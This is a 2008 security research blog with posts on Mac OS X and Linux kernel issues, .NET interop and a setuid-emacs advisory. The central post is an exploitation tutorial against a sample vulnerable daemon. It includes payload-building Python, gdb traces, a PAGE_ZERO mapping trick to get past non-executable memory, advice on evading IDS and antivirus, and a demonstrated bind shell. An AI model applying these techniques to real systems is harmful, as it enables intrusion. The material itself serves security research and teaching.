Mon, 03 Nov 2008

Apple Mac OS X 10.4 temp_patch_ptrace(): Nonsense in kernel-land

Several software vendors realized, sometime during the 1990-2000 timeframe, that exporting system call tables within kernel address space was a bad idea. This obviously doesn't mean anything to Red Hat and other GNU/Linux vendors who are happily providing world readable System.map files. Not like anybody needs them, though.

Then again, you have to face potential funniness of contradictory measures, like Apple's own mistakes. This article won't talk about yet another bug introduced by a Linux developer working at Red Hat (and later silently fixed by another employee of the very same company), but an interesting issue with Mac OS X 10.4 systems on PowerPC.

The temp_patch_ptrace() function: how to fix an issue and introduce a new one

Albeit the implementation of ptrace on Mac OS X is severely crippled, they had time to add a nifty trick to prevent immediate debugging of certain processes. Undocumented, it was obviously used only by Apple's own software, namely iTunes and related applications. A private flag set by a process would disallow future interaction with it via ptrace or other mechanisms, thus causing the gdb debugger to fail when trying to attach to the target process. A modern version of the good old trick first described publicly by Silvio Cesare in one of his anti-debugging articles.

Apple, possibly with the intention of helping anti-piracy software vendors (in their quest to preserve all that is good and just in the software industry and beyond) added a KPI (Kernel Programming Interface) that let's a kernel extension patch the ptrace system call. The sysent variable (the BSD equivalent of the Linux syscall_table, holding pointers, arguments and other data of the supported system calls) is not exported in any Mac OS X system, as a measure to prevent abuse (for example, in rootkits and other malware subverting kernel-land code).

Therefore, there's no absolutely reliable method to patch the system call table without resorting to hacks (even though these can be extremely reliable, mostly always they are tied to specific versions and or architectures). Hence, the existence of temp_patch_ptrace. See the implementation of the function below:

481 /* 
482  * WARNING - this is a temporary workaround for binary compatibility issues
483  * with anti-piracy software that relies on patching ptrace (3928003).
484  * This KPI will be removed in the system release after Tiger.
485  */
486 uintptr_t temp_patch_ptrace(uintptr_t new_ptrace)
487 {
488         struct sysent *         callp;
489         sy_call_t *                     old_ptrace;
490 
491         if (new_ptrace == 0)
492                 return(0);
493                 
494         enter_funnel_section(kernel_flock);
495         callp = &sysent[26];
496         old_ptrace = callp->sy_call;
497         
498         /* only allow one patcher of ptrace */
499         if (old_ptrace == (sy_call_t *) ptrace) {
500                 callp->sy_call = (sy_call_t *) new_ptrace;
501         }
502         else {
503                 old_ptrace = NULL;
504         }
505         exit_funnel_section( );
506         
507         return((uintptr_t)old_ptrace);
508 }

It's not available on Leopard. The implications of this are fairly evident:

So, why would Apple stop exporting the sysent structure and still provide a function with the purpose of patching a system call? Why not exporting sysent if a linear memory search is trivial to use for locating it on memory (which has been used historically by Linux rootkits)?

Tue, 28 Oct 2008

Linux Kernel Silent Patching: VMI write_ldt_entry() privilege escalation

Once again, the Linux kernel developers delight us with their always discreet (read: silent, no-advisory, no-warning policy) and wonderful patching practices. Sometime between 2.6.24 and 2.6.25 a patch from a Red Hat developer was committed into the Linux kernel git tree, implementing changes to the VMI interfaces hooking some functions dealing with the GDT and LDT.

diff --git a/arch/x86/kernel/vmi_32.c b/arch/x86/kernel/vmi_32.c
index 6ca515d..edfb09f 100644
--- a/arch/x86/kernel/vmi_32.c
+++ b/arch/x86/kernel/vmi_32.c
@@ -235,7 +235,7 @@ static void vmi_write_ldt_entry(struct desc_struct *dt, int entry,
 				const void *desc)
 {
 	u32 *ldt_entry = (u32 *)desc;
-	vmi_ops.write_idt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
+	vmi_ops.write_ldt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
 }
 
 static void vmi_load_sp0(struct tss_struct *tss,

It's not truly clear if there's a reliable way to abuse this issue properly (since data passed to sys_modify_ldt goes through several checks and might not trigger the vulnerable code path right away). Although, the original commit mentions that it was discovered when JRE caused failures. In addition, vmi_ops.write_idt_entry might do further validation, thus reducing the issue to a mere denial of service in the worst case. Also, it affects only x86 VMI guests.

Wed, 15 Oct 2008

Custom shellcode and return-to-libc on Mac OS X

After some time without any updates coming up, this article will show some techniques and strategies to improve reliability of exploit code in Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid loading of stager shellcode and evading non-executable stack restrictions. This was hinted at the "OS X Exploits and Defense" book (Elsevier), chapter 7, which I wrote earlier this year (co-authored the book with Kevin Finisterre).

Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only they are identified by IDS vendors but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality in small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).

Caveats

When using a stager, you might find few different shortcomings that prevent your code from being reliable or effective against the most wide span of architectures and platforms:

The sample vulnerable daemon

vulnerabled is a (TCP based) network daemon which processes incoming messages and seeks a callto:// handler. Then it reads whatever is trailing after the handler string. Imagine this daemon is used to connect to a VoIP solution that calls numbers provided by a crawler to do phone spam or targeted advertisement.

The daemon properly reads the incoming message into a heap allocated buffer, named tmpbuf. Its contents are zeroed every time the loop runs, therefore making reliable usage of the buffer impossible on two consecutive runs if tmpbuf points to the same address. A memory leak would help in this situation, but there's none.

Afterwards, data is read from the incoming connection, into tmpbuf. It NULL-terminates the buffer, but if tmpbuf address is overwritten, a NULL byte will be written off-bounds. Such a situation could be useful in certain cases, but we won't be looking into this particular possibility in depth for this article; a single NULL byte write can indeed lead to arbitrary code execution, as long as some requirements are met: here the offset will be equal to the length of the data received from the client, thus we will need to send a payload of specific length to match the offset (example: target address minus address of tmpbuf) where we want our NULL to be injected.

22	    char *tmpbuf = NULL;
23	    char vulnbuf[265];
...
37	    tmpbuf = malloc(8092);
...
74	    while(1) {
...
91	        memset(vulnbuf, 0, sizeof(vulnbuf));
...
96	        if ((recvlen = recv(connfd, tmpbuf, 8092, 0)) != -1)
97	        {
98	            tmpbuf[recvlen] = '\0';

If the incoming data contains the handler string, it reads the trailing string into the stack-based buffer named vulnbuf, which has a fixed size of 265 bytes. A stack-based buffer overflow condition with a twist: we can abuse variable ordering to do a more sophisticate attack against vulnerabled. Instead of a single packet payload, we will dedicate one to send the main payload and a second one to trigger it and subvert the execution flow in an elegant manner. This will allow us to introduce the main topic of this article: creating custom shellcode for evading security measures and improved reliability of stagers.

100	            if ((recvlen > handlerlen) &&
101	                (!memcmp(tmpbuf, DEFAULT_HANDLER, handlerlen)))
102	            {            
106	                memcpy(vulnbuf, tmpbuf+handlerlen, recvlen-handlerlen);
107	                fprintf(stdout, "received message: %s\n", vulnbuf);
108	            }
109	        
110	            if (recvlen > 4 && (tmpbuf[0] == '.') &&
111	                (tmpbuf[1] == 'e') && (tmpbuf[2] == 'n') &&
112	                (tmpbuf[3] == 'd'))
113	                break;

The exploit approach

In the previous section we walked through the code of the sample vulnerable daemon, reviewing the potentially exploitable security issues. Finally, we suggested an elegant approach to abuse the issues for reliable code execution against Apple Mac OS X Leopard 10.5.5. This section will explain said approach thoroughly.

The layout of the attack is as follows:

  1. Initial payload:
    1. Handler string (callto://)
    2. Small NOP sled
    3. Custom mprotect() and pre-stager shellcode
    4. Stager shellcode
    5. Instructions to return or exit gracefully
    6. Random alphanumeric padding
    7. Address to EBP
  2. Second "trigger" payload:
    1. Handler string (callto://)
    2. End control message (.end)
    3. Address to write at EBP+4 (saved EIP)
data += self.shellcode
data += self.random_string(265-len(self.shellcode))
data += self.random_string(4)
data += self.random_string(4)
data += struct.pack('<L', ebp_address)

heap_jumper = ''
heap_jumper += '.end'
heap_jumper += struct.pack('<L', 0x80000c)

You might have noticed that writing to EBP for overwriting saved EIP requires us to write 4 bytes preceding the new EIP value. The length of the end control message is... exactly 4 bytes. And that's the condition that let's us abuse the variable ordering to point tmpbuf at EBP directly and overwrite saved EIP correctly. The final payload is copied by recv into EBP:

(gdb) p $ebp
$32 = (void *) 0xbffff888
(gdb) p tmpbuf
$33 = 0xbffff888 ".end\f"
(gdb) x/2x tmpbuf
0xbffff888:	0x646e652e	0x0080000c
(gdb) x/i 0x0080000c
0x80000c:	nop
(gdb) p recvlen 
$34 = 8

Note the address pointing to the heap buffer which was allocated initially. Mac OS X has an absolutely predictable heap, fortunately for us, unfortunate for the end-user security. We have effectively overwritten a pointer address to force the next recv call to write arbitrary data on EBP.

(gdb) c
Continuing.
vulnerabled(1654) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0080002b in ?? ()

(gdb) x/4i $eip
0x80002b:	xor    %eax,%eax
0x80002d:	push   %eax
0x80002e:	push   %eax
0x80002f:	push   $0x1012

(gdb) i f
Stack level 0, frame at 0xbffff888:
 eip = 0x80002b; saved eip 0xbf800000
 called by frame at 0x800032
 Arglist at 0xbffff880, args: 
 Locals at 0xbffff880, Previous frame's sp is 0xbffff888
 Saved registers:
  ebp at 0xbffff880, eip at 0xbffff884

There's a catch: if the binary has been compiled with IBM Stack Smashing Protector (SSP, in the past, known as ProPolice) the arrangement of variables on memory will be different and we won't be able to reach the pointer from the stack-based buffer, thus rendering this approach impossible.

Custom shellcode, stagers and non-executable stack

The custom shellcode explained here will use only a single function from libSystem (the libc of sorts on OS X): mprotect. It should be feasible to change memory protections using a different method, but this is suitable for a re-spawning daemon since we can bruteforce the dyld stub address.

It uses the mmap and mlock system calls, to map memory at PAGE_ZERO (NULL, 0x00000000) and lock pages to physical memory, respectively.

This is the first time that this technique appears (specifically for OS X) publicly. The MACH-O binary format defines a zeroed, unmapped memory segment at position 0, named PAGE_ZERO. It remains unmapped under normal circumstances to force exceptions on NULL dereference conditions (read/write to NULL, offset from NULL when reading a member of a structure pointing at NULL, etc).

If we map PAGE_ZERO and set its permissions to read-write-execute, we will have space of PAGE_SIZE length (4096 bytes on x86) for storing shellcode stages and pretty much anything we could find useful. Side-effects of mapping PAGE_ZERO will be difficult to predict. Any future mistakes and programming errors that dereference NULL or a offset from NULL won't raise an exception. Also, if data is written there, our shellcode or data will be corrupted. Therefore, for safety purposes, we might want to leave an initial set of bytes at NULL unused (unchanged, thus zeroed). If data changes in the initial bytes, we could raise an exception to emulate normal behavior, in case it's been done as part of a test to detect our presence.

Mapping PAGE_ZERO will be clearly visible and it's not subtle if it remains in mapped state for a long time. Apparently the dyld loader and other operations during MACH-O execution time map the segment for a very short time.

The mprotect produces the following results when executed within the context of vulnerabled after successful exploitation, before execution of the stager shellcode:

Stack                  bf800000-bffff000 [ 8188K] rwx/rwx SM=PRV  
Stack                  bffff000-c0000000 [    4K] rwx/rwx SM=COW  thread 0
Stack                   [   8192K]

And the mmap of PAGE_ZERO produces the following results (note the initial unmapped state, and the different permissions afterwards, before the final mprotect call):

Before mmap():
__PAGEZERO             00000000-00001000 [    4K] ---/--- SM=NUL .../vulnerabled
__PAGEZERO              [      4K]

Before mprotect():
__PAGEZERO             00000000-00001000 [    4K] rw-/rwx SM=NUL .../vulnerabled

After mprotect():
__PAGEZERO             00000000-00001000 [    4K] rwx/rwx SM=NUL .../vulnerabled

Now our stager shellcode will be able to write data received from the attacking host to a writable and executable region at a static address, without requiring allocation using non-static locations.

Conclusions

Developing custom shellcode is trivial in most situations, albeit testing can be tiresome. Mac OS X lack of heap and mmap randomization is embarrassing, and its layout has been repeatedly demonstrated to be easily predictable. Also, heap memory permissions aren't enforced against execution (and read implies execute on Intel), thus making heap a safe bet for storing our shellcode, and other data on runtime during exploitation. ASLR in Leopard is incredibly weak, allowing trivial abuse of daemons and applications re-spawning after an exception, and certain dyld ABI is still static. Last but not least, lack of general memory permissions enforcement allows regions to be made executable, thus defeating the whole purpose of both ASLR and NX on OS X.

$ python vulnerabled_exploit.py -s 127.0.0.1 -p 6888
[+] Target vulnerabled at 127.0.0.1:6888 ...
[+] Running...
[+] Finished (shellcode was 152 bytes, 290 total).
[+] Check 127.0.0.1:6900 for shell.

(gdb) r
Starting program: ./vulnerabled 
Reading symbols for shared libraries ++. done
Starting ./vulnerabled (pid: 2141, port: 6888)...
connection from 127.0.0.1
tmpbuf=0x800000 vulnbuf=0xbffff74b esp=0xbffff6f0
it's a good message! (282 bytes, 273 in data)
received message: ??????????1??R???
connection from 127.0.0.1
tmpbuf=0xbffff888 vulnbuf=0xbffff74b esp=0xbffff6f0
vulnerabled(2141) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x8fe01010 in __dyld__dyld_start ()
(gdb) c
Continuing.
Reading symbols for shared libraries .. done


$ nc 127.0.0.1 6900
id
uid=501(myuser) gid=20(staff) groups=20(staff),98(_lpadmin), ...

Tue, 16 Sep 2008

Futile attempts and the joy of locked down Apache processes

Apparently someone, in his glaring innocence, is playing around Apache. Possibly we should start looking at mod_python or maybe mod_ssl. Maybe we can just let RBAC and PaX take care of it. But abuse departments are extremely responsive these days! One wonders what these people think when they have their DSL lines shut down.

Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28922]

The grand official Idiot of the Month, for your amusement. You might find it useful to add his IP range to your preferred spam blacklist as well. And another prop to spender for the brute force prevention feature of grsecurity, which makes exploiting re-spawning daemon vulnerabilities a hell more boring and futile. Especially when you have 40 bits of ASLR on your side. Yikes!

OrgName:    Road Runner HoldCo LLC 
OrgID:      RRMA
Address:    13241 Woodland Park Road
City:       Herndon
StateProv:  VA
PostalCode: 20171
Country:    US

ReferralServer: rwhois://ipmt.rr.com:4321

NetRange:   65.184.0.0 - 65.191.255.255 
CIDR:       65.184.0.0/13 
NetName:    RR
NetHandle:  NET-65-184-0-0-1
Parent:     NET-65-0-0-0-0
NetType:    Direct Allocation
NameServer: DNS1.RR.COM
NameServer: DNS2.RR.COM
NameServer: DNS3.RR.COM
NameServer: DNS4.RR.COM
Comment:    
RegDate:    2004-04-07
Updated:    2005-05-16

OrgAbuseHandle: ABUSE10-ARIN
OrgAbuseName:   Abuse 
OrgAbusePhone:  +1-703-345-3416
OrgAbuseEmail:  abuse@rr.com

OrgTechHandle: IPTEC-ARIN
OrgTechName:   IP Tech 
OrgTechPhone:  +1-703-345-3416
OrgTechEmail:  abuse@rr.com

Thu, 11 Sep 2008

Marshal and Native API bridging on Microsoft Windows (NT)

The .NET framework provides a Marshal class from its Runtime.InteropServices namespace which helps interfacing native and unmanaged data with managed code. The easy path for most of these cases is to simply use unsafe blocks and cast a pointer, but you end up losing references to allocated structures, leaking memory and likely leaving some funny exploitable condition in your unmanaged code bridge. Those pesky dangling pointers...

The function below calls an internal method to retrieve the list of loaded kernel modules from userland. It depends on NtQuerySystemInformation() and requires a heap-allocated structure array. Interfacing this with a C# managed class will require another exported function to call HeapFree() and release the allocated memory.
Using such an approach is certainly not recommended but it will cut you some hassle:

extern "C" __declspec(dllexport) PSYSTEM_MODULE_INFORMATION GetKernelModules(void)
{
	HANDLE tmpHeap = GetProcessHeap();
	PSYSTEM_MODULE_INFORMATION modList = NULL;
	
	LoadFunctionPointers();
	_getSysModules(&modList, tmpHeap);

	return modList;
}

extern "C" __declspec(dllexport) void MyFreeHeap(LPVOID ptrToFree)
{
	HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, ptrToFree);
}

On the C# side, we will be using a Marshal structure declaration in order to be able to use the PtrToStructure method, which allows us to copy memory from unmanaged space into our managed class, and then we can release whatever memory was allocated for the native API.

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 2)]
public struct SYSTEM_MODULE_INFORMATION
{
    [MarshalAs(UnmanagedType.U4)] public UInt32 Reserved1;
    [MarshalAs(UnmanagedType.U4)] public UInt32 Reserved2;
    ...
}

int curOffset = (int)(i * Marshal.SizeOf(Modules[i]));
IntPtr curPtr = new IntPtr(ModulesListPtr.ToInt32() + curOffset);

Modules[i] = (SYSTEM_MODULE_INFORMATION) Marshal.PtrToStructure(curPtr,
                   typeof(SYSTEM_MODULE_INFORMATION));

[DllImport("mylib.dll", CharSet = CharSet.Unicode)]
        private extern static void MyFreeHeap(IntPtr ptr);

Depending on your target platform, you might want to adjust CharSet since Unicode is the default on NT based systems (that is, all modern versions of Windows, excluding 9x/ME if you consider them modern... although in terms of security, it seems like Windows 98 is safer, after all, most malware doesn't work on it anymore). Packing is also important, since it means how your structure is actually stored on memory. Values of 1-2 are safe, just verify the alignment of the variables within the structure you are trying to use.
Some suggestions:

Wed, 10 Sep 2008

Alice in Wonder-setuid-emacs-land (CVE-2008-2324)

One may think that vulnerabilities can't get any more stupid, but there's always an Apple advisory to beat the record. A setuid Emacs binary? Seems like a plan. (From APPLE-SA-2008-07-31 and CVE-2008-2324).

Disk Utility
CVE-ID:  CVE-2008-2324
Available for:  Mac OS X v10.4.11, Mac OS X Server v10.4.11
Impact:  A local user may obtain system privileges
Description:  The "Repair Permissions" tool in Disk Utility makes
/usr/bin/emacs setuid. After the Repair Permissions tool has been
run, a local user may use emacs to run commands with system
privileges. This update addresses the issue by correcting the
permissions applied to emacs in the Repair Permissions tool. This
issue does not affect systems running Mac OS X v10.5 and later.
Credit to Anton Rang and Brian Timares for reporting this issue.

The "Repair Permissions" tool should have been removed from Mac OS X a long time ago.

Navigation

Archives

Syndication

Subscribe to our feed

Links

Send a tip

Meta

Powered by Python
Powered by (modified) Pybloxsom 100% free of PHP
Valid CSS!
Valid XHTML 1.0 Strict

License

Creative Commons License
Subreption blog by Subreption LLC is Licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License.